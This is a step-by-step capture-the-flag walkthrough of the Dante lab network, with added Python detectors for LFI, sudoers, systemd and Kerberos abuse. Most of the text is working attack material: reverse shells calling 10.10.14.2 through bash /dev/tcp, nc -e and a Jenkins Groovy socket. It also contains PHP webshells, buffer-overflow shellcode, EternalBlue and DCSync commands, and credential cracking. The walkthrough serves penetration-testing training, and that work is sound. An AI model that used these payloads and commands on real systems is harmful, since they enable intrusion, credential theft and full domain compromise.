Dante
Difficulty: Intermediate | OS: Mixed (Linux + Windows)
1. Reconnaissance — Network Discovery
Why: Map the external subnet to identify live hosts before targeted scanning.
nmap -sn -T4 10.10.110.0/24 -oN active-hosts
Key finding: Two active hosts — 10.10.110.2 (lab controller, ignore) and 10.10.110.100 (DANTE-WEB-NIX01).
nmap -T4 -sC -sV -p- --min-rate=1000 10.10.110.100
Open ports: 21 (FTP — anonymous login enabled), 22 (SSH), 65000 (HTTP — Apache/WordPress)
2. FTP Enumeration — DANTE-WEB-NIX01
Why: Anonymous FTP was flagged by Nmap. Unauthenticated access may expose sensitive files.
ftp 10.10.110.100
# anonymous / anonymous
cd Transfer/Incoming
get todo.txt
Key finding from todo.txt: LFI vulnerability exists on a site; user James has a weak password.
Note: robots.txt on port 65000 reveals /wordpress path and contains FLAG 1.
3. WordPress Enumeration & Foothold — DANTE-WEB-NIX01
Why: WordPress admin access allows theme file editing to achieve RCE.
wpscan --url http://10.10.110.100:65000/wordpress --enumerate vp
wpscan --url http://10.10.110.100:65000/wordpress --enumerate u
# Users found: admin, james
Build a custom wordlist from the site's content:
cewl http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks > words.txt
# Employee names from "Meet The Team" page:
cat > names.txt << EOF
james
kevin
kalthazar
aj
nathan
EOF
wpscan --url http://10.10.110.100:65000/wordpress --usernames names.txt --passwords words.txt
Credentials found: james : Toyota
Navigate to /wordpress/wp-admin/ → Appearance → Theme Editor → Twenty Nineteen → 404.php. Replace contents:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>
nc -lvnp 1234
# Trigger: curl http://10.10.110.100:65000/wordpress/wp-content/themes/twentynineteen/404.php
Shell received as www-data on DANTE-WEB-NIX01.
4. Privilege Escalation — DANTE-WEB-NIX01 (www-data → james → root)
Why: WordPress credentials reused on OS account. SUID find binary allows root escalation.
su james # password: Toyota
python3 -c 'import pty;pty.spawn("/bin/bash")'
# FLAG 2: james home directory
Check bash history for credential reuse:
cat /home/james/.bash_history
# Reveals MySQL credentials for balthazar: balthazar : TheJoker12345!
Find SUID binaries:
find / -perm -4000 2>/dev/null
# find binary is SUID root
find . -exec /bin/bash -p \; -quit
# FLAG 3: /root
Add SSH key persistence and set up pivot:
echo 'ssh-ed25519 <your_key>' >> /root/.ssh/authorized_keys
ssh -i id_rsa -D 1080 root@10.10.110.100
# Edit /etc/proxychains.conf: socks5 127.0.0.1 1080
5. LFI & SMB — DANTE-NIX02 (172.16.1.10)
Why: Proxychains pivot exposes internal subnet. NIX02 runs Apache with LFI and Samba with null sessions.
proxychains nmap 172.16.1.10 -sT -sV -Pn -T5
# Open: 22 (SSH), 80 (HTTP), 139/445 (Samba)
Test LFI:
# http://172.16.1.10/nav.php?page=../../../../../../etc/passwd
# Users found: frank, margaret
SMB null session enumeration:
# Use forward slashes (or escape the backslashes); \\host\share is mangled by the shell. -N requests a null session.
proxychains smbclient -L //172.16.1.10 -N
proxychains smbclient //172.16.1.10/SlackMigration -N
get admintasks.txt
# Reveals: WordPress installed at web root /var/www/html/
Extract wp-config.php via PHP filter wrapper:
# http://172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php
proxychains curl "http://172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php" | base64 -d > wp-config.php
# DB_USER: margaret | DB_PASSWORD: STARS5678FORTUNE401
proxychains ssh margaret@172.16.1.10
# Restricted shell — vim is allowed
Escape restricted bash with vim:
vim
:set shell=/bin/bash
:shell
# FLAG 4: margaret home directory
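Added detection example (Python, not part of the original writeup): the traversal and php://filter requests used above leave a distinctive trace in the Apache access log. The log lines below are constructed, including the client IP; the checker URL-decodes each query parameter and flags traversal sequences and PHP stream wrappers.

```python
# Detection check for LFI / PHP wrapper abuse in Apache combined-format logs.
# SAMPLE_LOG is constructed for this example; the client IP is made up.
from __future__ import annotations
import re
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
172.16.1.99 - - [10/Aug/2020:10:01:02 +0000] "GET /nav.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.16.1.99 - - [10/Aug/2020:10:01:09 +0000] "GET /nav.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
172.16.1.99 - - [10/Aug/2020:10:02:30 +0000] "GET /nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php HTTP/1.1" 200 4410 "-" "curl/7.68.0"
172.16.1.99 - - [10/Aug/2020:10:03:00 +0000] "GET /nav.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# PHP stream wrappers that should never arrive in a user-controlled include parameter.
WRAPPERS = ("php://", "phar://", "expect://", "data:", "file://", "zip://")


def classify_lfi(target: str) -> list[str]:
    """Return the LFI indicators found in one request target (path + query)."""
    findings = []
    query = urlsplit(target).query
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            # parse_qs decoded once already; decode again to catch double encoding.
            value = unquote(raw)
            if "../" in value or "..\\" in value:
                findings.append(f"{key}: path traversal")
            low = value.lower()
            for wrapper in WRAPPERS:
                if low.startswith(wrapper):
                    findings.append(f"{key}: {wrapper} stream wrapper")
    return findings


def scan_access_log(text: str) -> list[dict]:
    """Parse each log line and keep only the requests carrying LFI indicators."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_lfi(m["target"])
        if findings:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                         "target": m["target"], "findings": findings})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["status"], "; ".join(h["findings"]), h["target"])
```

A 200 status on a flagged request (as in the sample) is the strongest signal, since it means the include actually succeeded.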
6. Lateral Movement & Privesc — DANTE-NIX02 (margaret → frank → root)
Why: Slack config files contain plaintext credentials for frank. A cron-executed Python script is vulnerable to module hijacking.
ls /home/margaret/.config/Slack/
# Enumerate exported Slack data — channel logs
# frank's credentials found in secure channel chat logs
su frank
Check running processes:
wget http://10.10.14.2/pspy && chmod +x pspy && ./pspy
# root executes /home/frank/apache_restart.py every minute
Python module hijack (urllib):
# /home/frank/urllib.py
import os
os.system("cp /bin/sh /tmp/sh;chmod u+s /tmp/sh")
# Wait 1 minute
/tmp/sh -p
# FLAG 5: /root
7. Webmin RCE — DANTE-NIX03 (172.16.1.17)
Why: SMB share contains a packet capture. Wireshark reveals Webmin credentials. Webmin 1.900 is vulnerable to authenticated RCE.
proxychains nmap 172.16.1.17 -sT -sV -Pn -T5
# Open: 80 (HTTP), 139/445 (Samba), 10000 (Webmin HTTP)
proxychains smbclient //172.16.1.17/forensics -N
get monitor
wireshark monitor
# Follow HTTP stream → admin : Password6543 (capital P, second POST request)
Webmin 1.900 RCE (below 1.930 is vulnerable):
nc -lvnp 1234
proxychains python webmin_exploit.py --rhost 172.16.1.17 --lhost 10.10.14.2 --lport 1234 -u admin -p Password6543
python -c 'import pty;pty.spawn("/bin/bash")'
# FLAG 6: /root
8. Online Discussion Forum RCE — DANTE-WS01 (172.16.1.13)
Why: XAMPP host running Online Discussion Forum 1.0 which allows unauthenticated PHP file upload during user registration.
proxychains nmap 172.16.1.13 -sT -sV -Pn -T5
# Open: 80 (HTTP), 443 (HTTPS)
gobuster dir -p socks5://127.0.0.1:1080 --url http://172.16.1.13/ -w common.txt
# Found: /discuss
Register a new user, upload shell.php as the profile image:
<?php echo exec($_GET["cmd"]);?>
Webshell available at /discuss/ups/shell.php. Download nc.exe and get reverse shell:
python3 -m http.server 80
# http://172.16.1.13/discuss/ups/shell.php?cmd=powershell wget http://10.10.14.2/nc.exe -o nc.exe
nc -lvnp 1234
# http://172.16.1.13/discuss/ups/shell.php?cmd=nc.exe -e cmd.exe 10.10.14.2 1234
# Shell as gerald on DANTE-WS01
# FLAG 7: gerald desktop
9. Druva inSync LPE — DANTE-WS01 (gerald → SYSTEM)
Why: Non-default software Druva inSync 6.6.3 is installed, which is vulnerable to a local privilege escalation that allows adding users to administrators group and spawning a SYSTEM shell.
# Check: C:\Program Files\Druva\inSync\licence.txt — version 6.6.3
powershell wget 10.10.14.2/druva.py -o druva.py
# Step 1: Add gerald to administrators
c:\python27\python.exe druva.py "net localgroup administrators gerald /add"
# Step 2: Spawn SYSTEM shell (bypass UAC)
powershell wget 10.10.14.2/nc.exe -o C:\xampp\htdocs\discuss\ups\nc.exe
c:\python27\python.exe druva.py "windows\system32\cmd.exe /C C:\xampp\htdocs\discuss\ups\nc.exe 10.10.14.2 4444 -e cmd.exe"
# Shell as nt authority\system
# FLAG 8: Administrator desktop
10. SQL Injection — DANTE-NIX04 (172.16.1.12)
Why: Responsive Blog 1.0 on NIX04 is vulnerable to SQL injection. sqlmap extracts the flag directly and cracks admin credentials for SSH access.
proxychains nmap 172.16.1.12 -sT -sV -Pn -T5
# Open: 21 (FTP), 80 (HTTP), 443 (HTTPS), 3306 (MySQL)
gobuster dir -p socks5://127.0.0.1:1080 --url http://172.16.1.12 -w common.txt
# Found: /blog — Responsive Blog
# Validate SQLi: http://172.16.1.12/blog/category.php?id=2' → SQL error
proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 --dbs --batch
proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 -D flag --dump
# FLAG 9: flag table
proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 -D blog_admin_db -T membership_users --dump
Crack MD5 hashes:
# Hashes: 21232f297a57a5a743894a0e4a801fc3 / 442179ad1de9c25593cabf625c0badb7 / d6501933a2e0ea1f497b87473051417f
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
# Cracked: admin, ben:Welcometomyblog
proxychains ssh ben@172.16.1.12
# FLAG 10: ben home directory
11. Privilege Escalation — DANTE-NIX04 (ben → julian → root)
Why: sudo entry allows running /bin/bash as any user except root. A known sudo 1.8.27 bypass (CVE-2019-14287) allows root via negative UID.
sudo -l
# (ALL, !root) /bin/bash
sudo -u julian /bin/bash
# LinPEAS: sudo version 1.8.27 — CVE-2019-14287
sudo -u#-1 /bin/bash
# FLAG 11: /root
# Dump julian shadow hash and crack
grep julian /etc/shadow
john hash --wordlist=rockyou.txt
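Added audit example (Python, not part of the original writeup): the sudoers shape abused above, a Runas list of (ALL, !root), is worth flagging on every host, and the bypass only works while sudo is older than 1.8.28. The sudoers excerpt is constructed; only the ben line mirrors the sudo -l output above.

```python
# Audit for (ALL, !root)-style sudoers rules and the sudo version they are exploitable on.
# SAMPLE_SUDOERS is constructed for this example.
import re

SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
ben     ALL=(ALL, !root) /bin/bash
backup  ALL=(postgres) NOPASSWD: /usr/bin/pg_dump
%admin  ALL=(ALL) ALL
"""

RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmd>.*)$")


def parse_version(version: str) -> tuple:
    """'1.8.27' -> (1, 8, 27); '1.8.27p1' -> (1, 8, 27, 1)."""
    return tuple(int(x) for x in re.findall(r"\d+", version))


def sudo_affected_by_cve_2019_14287(version: str) -> bool:
    """Before 1.8.28, a negative uid given with -u# resolved to uid 0 despite '!root'."""
    return parse_version(version) < (1, 8, 28)


def find_negated_root_runas(sudoers: str) -> list:
    """Rules whose Runas user list contains both ALL and !root. Independently of the
    CVE, the sudoers manual warns that negating Runas entries is not a reliable
    restriction; an explicit list of permitted target users is the fix."""
    flagged = []
    for line in sudoers.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        runas_users = m["runas"].split(":")[0]  # drop the optional Runas group part
        entries = {e.strip() for e in runas_users.split(",")}
        if "ALL" in entries and "!root" in entries:
            flagged.append({"user": m["user"], "runas": m["runas"], "cmd": m["cmd"]})
    return flagged


def audit(sudoers: str, sudo_version: str) -> list:
    """Flagged rules, each annotated with whether the bypass works on this sudo build."""
    vulnerable = sudo_affected_by_cve_2019_14287(sudo_version)
    return [dict(rule, bypassable=vulnerable) for rule in find_negated_root_runas(sudoers)]


if __name__ == "__main__":
    for r in audit(SAMPLE_SUDOERS, "1.8.27"):
        print(r)
```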
12. Online Marriage Registration RCE — DANTE-WS03 (172.16.1.102)
Why: Windows host running Online Marriage Registration System with a known authenticated RCE vulnerability.
proxychains nmap 172.16.1.102 -sT -Pn -T5
# Open: 80, 135, 139, 443, 445, 3389, 5357
# Register new user, run exploit
chmod +x exploit.sh
proxychains ./exploit.sh -u http://172.16.1.102/ -m 1231231231 -p test -c "whoami"
python3 -m http.server 80
proxychains ./exploit.sh -u http://172.16.1.102/ -m 1231231231 -p test -c "powershell wget 10.10.14.2/nc.exe -o nc.exe"
nc -lvnp 1234
proxychains ./exploit.sh -u http://172.16.1.102/ -m 1231231231 -p test -c "nc.exe -e cmd.exe 10.10.14.2 1234"
# Shell as blake on DANTE-WS03
# FLAG 12: blake desktop
13. Buffer Overflow (32-bit) — DANTE-WS03 (blake → SYSTEM)
Why: Custom service SERVER.EXE running on port 4444 has a stack-based BOF due to unsafe strcpy_s with a 1024-byte destination buffer and 2048-byte user input.
plink.exe -R 4444:127.0.0.1:4444 -l root -P 22 -pw toor 10.10.14.2
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=3333 connectaddress=127.0.0.1 connectport=4444 protocol=tcp
# Ghidra analysis confirms BOF. Offset: 1028. JMP ESP: 0x10476d73
# Bad chars: \x00, \x0a, \x0d
msfvenom -p windows/shell_reverse_tcp LHOST=<tun0_ip> LPORT=9999 -b "\x00\x0a\x0d" -f python
Final exploit:
payload = "A" * 1028 + "\x73\x6d\x47\x10" + "\x90" * 20 + buf
nc -lvnp 9999
python bof.py 127.0.0.1 4444
# Shell as nt authority\system on DANTE-WS03
# FLAG 13: Administrator desktop
14. EternalBlue (MS17-010) — DANTE-DC01 (172.16.1.20)
Why: Windows Server 2012 R2 DC running SMB, confirmed vulnerable to MS17-010. Unauthenticated RCE as SYSTEM.
proxychains nmap -sT -sV -Pn -T5 172.16.1.20
# Windows Server 2012 R2 — Kerberos/LDAP/SMB confirm DC
proxychains msfconsole
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 172.16.1.20
check # vulnerable
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
run
# nt authority\system on DANTE-DC01
Post-exploitation:
# Excel spreadsheet on desktop — unhide column B for passwords
# net user mrb3n — flag in Comment field
# FLAG 14: mrb3n user Comment property
# FLAG 15: Administrator desktop
15. PHP Phar Deserialization — DANTE-NIX05 (172.16.1.37)
Why: Web app exposes PHP backup files revealing a Store class with a vulnerable __destruct() method. The phar:// wrapper triggers deserialization on file delete, leading to arbitrary file write and RCE.
proxychains nmap -sT -Pn -sV -T5 172.16.1.37
gobuster dir -p socks5://127.0.0.1:1080 --url http://172.16.1.37/ -w /usr/share/wordlists/dirb/common.txt -x php.bak
proxychains curl http://172.16.1.37/feedback.php.bak -o feedback.php.bak
proxychains curl http://172.16.1.37/save.php.bak -o save.php.bak
# save.php.bak: Store class __destruct() → file_put_contents($filename, $contents)
Create malicious phar archive:
<?php
class Store {}
$phar = new \Phar("shell.phar");
$phar->startBuffering();
$phar->addFromString("test.txt", "test");
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$payload = new Store;
$payload->filename = "/var/www/html/uploads/test.php";
$payload->contents = '<?php echo exec($_GET["cmd"]);?>';
$phar->setMetadata($payload);
$phar->stopBuffering();
?>
# phar.readonly defaults to On, which blocks writing the archive; override it for this run
php -d phar.readonly=0 test.php
# Upload shell.phar (rename to .png in Burp) → delete via phar:// wrapper → creates test.php
# RCE at /uploads/test.php?cmd=id — running as pericles
# Copy SSH key to /home/pericles/.ssh/authorized_keys
proxychains ssh pericles@172.16.1.37
# FLAG 16: pericles home directory
16. Systemd Timer Abuse — DANTE-NIX05 (pericles → root)
Why: A systemd timer runs /usr/bin/tmp_delete.sh as root every minute and pericles has write access.
proxychains scp LinEnum.sh pericles@172.16.1.37:/tmp/linenum.sh
bash /tmp/linenum.sh
# Non-default timer: tmp_delete.service — runs every minute as root
# pericles has write access to /usr/bin/tmp_delete.sh
echo 'cp /bin/sh /home/pericles/sh && chmod u+s /home/pericles/sh' > /usr/bin/tmp_delete.sh
# Wait 1 minute
/home/pericles/sh -p
# FLAG 17: /root
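Added audit example (Python, not part of the original writeup): the weakness above is a root-run systemd unit whose Exec* target a lower-privileged user can overwrite. The unit text and the stat() results are constructed; the stat function is injectable, so the same check runs against a live host with the default os.stat.

```python
# Audit: Exec* paths of root-run systemd units that a non-root user could modify.
# SAMPLE_UNIT and FAKE_FS are constructed for this example.
import os
import re
import shlex
import stat
from types import SimpleNamespace

SAMPLE_UNIT = """\
[Unit]
Description=Delete temporary files

[Service]
Type=oneshot
ExecStart=/usr/bin/tmp_delete.sh
ExecStartPost=-/bin/rm -f /tmp/cleanup.lock
"""

# Constructed stat() results: tmp_delete.sh owned by uid 1001 (a regular user), rm by root.
FAKE_FS = {
    "/usr/bin/tmp_delete.sh": SimpleNamespace(st_mode=0o100755, st_uid=1001),
    "/bin/rm": SimpleNamespace(st_mode=0o100755, st_uid=0),
}

EXEC_KEYS = ("ExecStart", "ExecStartPre", "ExecStartPost", "ExecReload", "ExecStop", "ExecStopPost")


def exec_paths(unit_text: str) -> list:
    """Executable of every Exec*= line, minus systemd's prefix characters (-, @, :, +, !)."""
    paths = []
    for line in unit_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() in EXEC_KEYS and value.strip():
            paths.append(shlex.split(value.strip())[0].lstrip("-@:+!"))
    return paths


def runs_as_root(unit_text: str) -> bool:
    """No User= line (or User=root) means the service runs as root."""
    m = re.search(r"^\s*User\s*=\s*(\S+)", unit_text, re.M)
    return m is None or m.group(1) == "root"


def writable_by_non_root(st) -> bool:
    """Root executes this file, so anyone else being able to change it is a privesc path."""
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_unit(unit_text: str, stat_fn=os.stat) -> list:
    """Exec* paths in a root-run unit that a non-root user could modify."""
    if not runs_as_root(unit_text):
        return []
    risky = []
    for path in exec_paths(unit_text):
        try:
            st = stat_fn(path)
        except (OSError, KeyError):
            continue  # missing path: a different (and also interesting) finding
        if writable_by_non_root(st):
            risky.append(path)
    return risky


def demo() -> list:
    return audit_unit(SAMPLE_UNIT, stat_fn=lambda p: FAKE_FS[p])


if __name__ == "__main__":
    print(demo())  # ['/usr/bin/tmp_delete.sh']
```

On a real host, feed it the unit files behind `systemctl list-timers --all` and also check that the parent directories are root-owned, since a writable directory lets the script be replaced rather than edited.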
17. elearning RCE — DANTE-WS04 (172.16.1.45)
Why: XAMPP host running an elearning CMS with default admin credentials. Admin panel allows PHP file upload as student profile image. Windows Defender requires AV bypass.
proxychains nmap -sT -Pn -sV -T5 172.16.1.45
gobuster dir -p socks5://127.0.0.1:1080 --url http://172.16.1.45/ -w /usr/share/wordlists/dirb/big.txt
# Found: /elearning — default admin credentials
# Students → Add Student → upload shell.php
# RCE at /elearning/admin/uploads/shell.php
AV bypass with prometheus.cpp:
i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
# Shell received as leroy on DANTE-WS04
# FLAG 18: leroy home directory
18. PSReadLine History — DANTE-WS04 (leroy → Administrator)
Why: PowerShell v5+ logs command history by default, including commands with hardcoded credentials.
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Reveals: administrator : KingOfTheMountain
proxychains rdesktop -u administrator -p KingOfTheMountain 172.16.1.45
# FLAG 19: Administrator desktop
19. FTP Brute Force & IObit Unquoted Service Path — DANTE-WS02 (172.16.1.101)
Why: FTP service lacks lockout policy. A hint reveals dharding's password was changed to a different number. IObit IObitUnSvr runs as SYSTEM with an unquoted binary path and dharding has ChangeConfig rights.
proxychains nmap -sT -Pn -sV -T5 172.16.1.101
use auxiliary/scanner/ftp/ftp_login
set USER_FILE users.txt
set PASS_FILE passwords.txt
set RHOSTS 172.16.1.101
run
# Found: dharding : WestminsterOrange5
# Note on FTP: password has different number (not 5)
for i in {0..10};do echo "WestminsterOrange$i" >> words.txt;done
proxychains cme winrm 172.16.1.101 -u dharding -p words.txt
# Found: dharding : WestminsterOrange10
proxychains evil-winrm -i 172.16.1.101 -u dharding -p WestminsterOrange10
# FLAG 20: dharding desktop
upload nc.exe
# sc.exe requires a space after "binPath="
sc.exe config IObitUnSvr binPath= "cmd.exe /c C:\Users\dharding\Documents\nc.exe -e cmd.exe 10.10.14.2 3333"
sc.exe stop IObitUnSvr && sc.exe start IObitUnSvr
# nt authority\system — grab flag within 30 seconds before SCM kills service
# FLAG 21: Administrator desktop
20. FTP Flag & Subnet Discovery — DANTE-NIX01 (172.16.1.5)
Why: Internal host with anonymous FTP access. Ping sweep from DC01 reveals the 172.16.2.0/24 subnet.
ftp 172.16.1.5
# anonymous : anonymous
passive
get flag.txt
# FLAG 22
# From DANTE-DC01 meterpreter session:
(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "Reply"
# New host: 172.16.2.5
21. ASREPRoasting & DCSync — DANTE-DC02 (172.16.2.5)
Why: Second DC on isolated subnet. jbercov has pre-authentication disabled allowing ASREPRoasting. BloodHound reveals DCSync rights enabling full domain compromise.
# Forward ports through meterpreter session on DC01
meterpreter > portfwd add -L 127.0.0.1 -l 53 -p 53 -r 172.16.2.5
meterpreter > portfwd add -L 127.0.0.1 -l 88 -p 88 -r 172.16.2.5
./kerbrute_linux_amd64 userenum -d dante --dc 127.0.0.1 users.txt
# Valid user: jbercov
GetNPUsers.py dante/jbercov -no-pass -dc-ip 127.0.0.1
john tgt-hash --wordlist=rockyou.txt
# jbercov : myspace7
meterpreter > portfwd add -L 127.0.0.1 -l 5985 -p 5985 -r 172.16.2.5
evil-winrm -i 127.0.0.1 -u jbercov -p myspace7
# FLAG 23: jbercov desktop
BloodHound → jbercov has GetChangesAll on DANTE.ADMIN → DCSync:
upload SharpHound.ps1
import-module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
download 20200811054926_BloodHound.zip
# BloodHound: jbercov → GetChangesAll → DANTE.ADMIN domain
meterpreter > portfwd add -L 127.0.0.1 -l 445 -p 445 -r 172.16.2.5
secretsdump.py dante/jbercov@127.0.0.1 -just-dc-user Administrator
use exploit/windows/smb/psexec
set rhosts 127.0.0.1
set smbuser administrator
set smbpass <NTLM_HASH>
set payload windows/meterpreter/reverse_tcp
run
# nt authority\system on DANTE-ADMIN-DC02
# FLAG 24: Administrator desktop
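Added detection example (Python, not part of the original writeup) for the two techniques in this section: AS-REP roasting shows up as Event 4768 served with Pre-Authentication Type 0 (usually with an RC4 ticket, 0x17), and DCSync as Event 4662 where a non-machine account exercises the DS-Replication-Get-Changes rights. The event records are constructed dictionaries shaped like the Security log fields, not real DANTE-DC02 logs; the allow-list parameter is an assumption for legitimate replication accounts such as a directory-sync service.

```python
# Detection for AS-REP roasting (4768, no pre-auth) and DCSync (4662, replication rights).
# SAMPLE_EVENTS is constructed for this example.
import re

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit that makes an account AS-REP roastable

# Control-access rights checked by Event 4662 when a principal replicates directory data.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jbercov", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "172.16.1.20"},
    {"EventID": 4768, "TargetUserName": "plongbottom", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "172.16.2.10"},
    {"EventID": 4662, "SubjectUserName": "jbercov",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "AccessMask": "0x100"},
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "AccessMask": "0x100"},
]


def has_dont_req_preauth(user_account_control: int) -> bool:
    """True when the account's UAC flags disable Kerberos pre-authentication (the fix is to clear it)."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


def detect(events, replication_allowlist=frozenset()):
    """Alerts for (a) 4768 AS-REQs served without pre-authentication and (b) 4662 use of
    replication rights by anything other than a machine account or an allow-listed
    replication service account."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 4768 and ev.get("PreAuthType") == "0":
            rc4 = ev.get("TicketEncryptionType", "").lower() == "0x17"
            alerts.append({"rule": "asreproast", "account": ev["TargetUserName"],
                           "src": ev.get("IpAddress"),
                           "detail": "no pre-auth" + (", RC4 ticket" if rc4 else "")})
        elif ev.get("EventID") == 4662:
            guids = set(re.findall(r"[0-9a-f-]{36}", ev.get("Properties", "").lower()))
            rights = sorted(REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS)
            subject = ev.get("SubjectUserName", "")
            if rights and not subject.endswith("$") and subject.lower() not in replication_allowlist:
                alerts.append({"rule": "dcsync", "account": subject, "src": None,
                               "detail": ", ".join(rights)})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["rule"], a["account"], a["src"], a["detail"])
```

Auditing for 4662 requires a SACL on the domain object for the replication rights; without it the event is never written.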
22. Jenkins Groovy RCE & disk Group — DANTE-NIX07 (172.16.1.19)
Why: Jenkins admin credentials found on DANTE-ADMIN-DC02. Groovy script console gives RCE as jenkins. ian user is in the disk group providing raw block device access.
# Jenkins.bat on DC02 → Admin_129834765 : SamsungOctober102030
proxychains nmap -Pn -sT -sV -T5 172.16.1.19
# Port 8080: Jenkins — login with above creds
# FLAG 25: FLAG_HERE job description
# Manage Jenkins → Script Console
String host="10.10.14.2";
int port=8888;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exception e){}};
p.destroy();s.close();
# Shell as jenkins on DANTE-NIX07
# pspy: root runs MySQL as ian — password visible in process list
su ian # ian is in disk group
cat /proc/self/mounts | grep 'sda'
# Root FS on /dev/sda5
debugfs /dev/sda5
# FLAG 26: /root via debugfs
23. SSH Brute Force & 64-bit BOF — DANTE-ADMIN-NIX05 (172.16.2.101)
Why: Host discovered via ping sweep from DC02. SSH brute force with the credentials collected so far. Custom readfile SUID binary has a 64-bit stack overflow (NX disabled, ASLR=0).
meterpreter > portfwd add -L 127.0.0.1 -l 7778 -p 22 -r 172.16.2.101
hydra -L users.txt -P passwords.txt ssh://127.0.0.1:7778
# julian : manchesterunited
ssh -p 7778 julian@127.0.0.1
# FLAG 27: julian desktop
find / -perm -4000 2>/dev/null
# /usr/sbin/readfile — SUID root, strcpy() vulnerability, offset 88
Exploit via shellcode in environment variable:
export SHELLCODE=`python2 -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`
gcc getenv.c -o getenv && chmod +x getenv
./getenv SHELLCODE /usr/sbin/readfile
# Get SHELLCODE address, e.g. 0x7fffffffe352
/usr/sbin/readfile $(python2 -c 'print "A"*88+"\x52\xe3\xff\xff\xff\x7f"')
# Root shell on DANTE-ADMIN-NIX05
# FLAG 28: /root
24. SSH Reuse & sudo — DANTE-ADMIN-NIX06 (172.16.2.6)
Why: julian's credentials are reused on NIX06. plongbottom's password comes from the earlier credential dump, and plongbottom is in the sudo group.
# Ping sweep from DANTE-ADMIN-NIX05
for i in {1..255};do (ping -c 1 172.16.2.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done
# New host: 172.16.2.6
ssh julian@172.16.2.6
# FLAG 29: julian desktop
# SQL file on desktop: Sophie SQL password = TerrorInflictPurpleDirt996655
su plongbottom # password: PowerfixSaturdayClub777
sudo su
# FLAG 30: /root
25. MSSQL xp_cmdshell & JuicyPotato — DANTE-SQL01 (172.16.1.5)
Why: sophie has sysadmin rights on MSSQL. xp_cmdshell enables OS command execution. A PowerShell backup script exposes plaintext credentials. SeAssignPrimaryToken privilege allows JuicyPotato SYSTEM escalation.
proxychains mssqlclient.py sophie@172.16.1.5
# Password: TerrorInflictPurpleDirt996655
SELECT IS_SRVROLEMEMBER ('sysadmin'); -- 1
EXEC sp_configure 'Show Advanced Options', 1; reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; reconfigure;
xp_cmdshell "whoami" -- nt service\mssql$sqlexpress
Get reverse shell:
# Two separate terminals: one serving the script, one catching the shell (&& would block nc until the server exits)
python3 -m http.server 80
nc -lvnp 4444
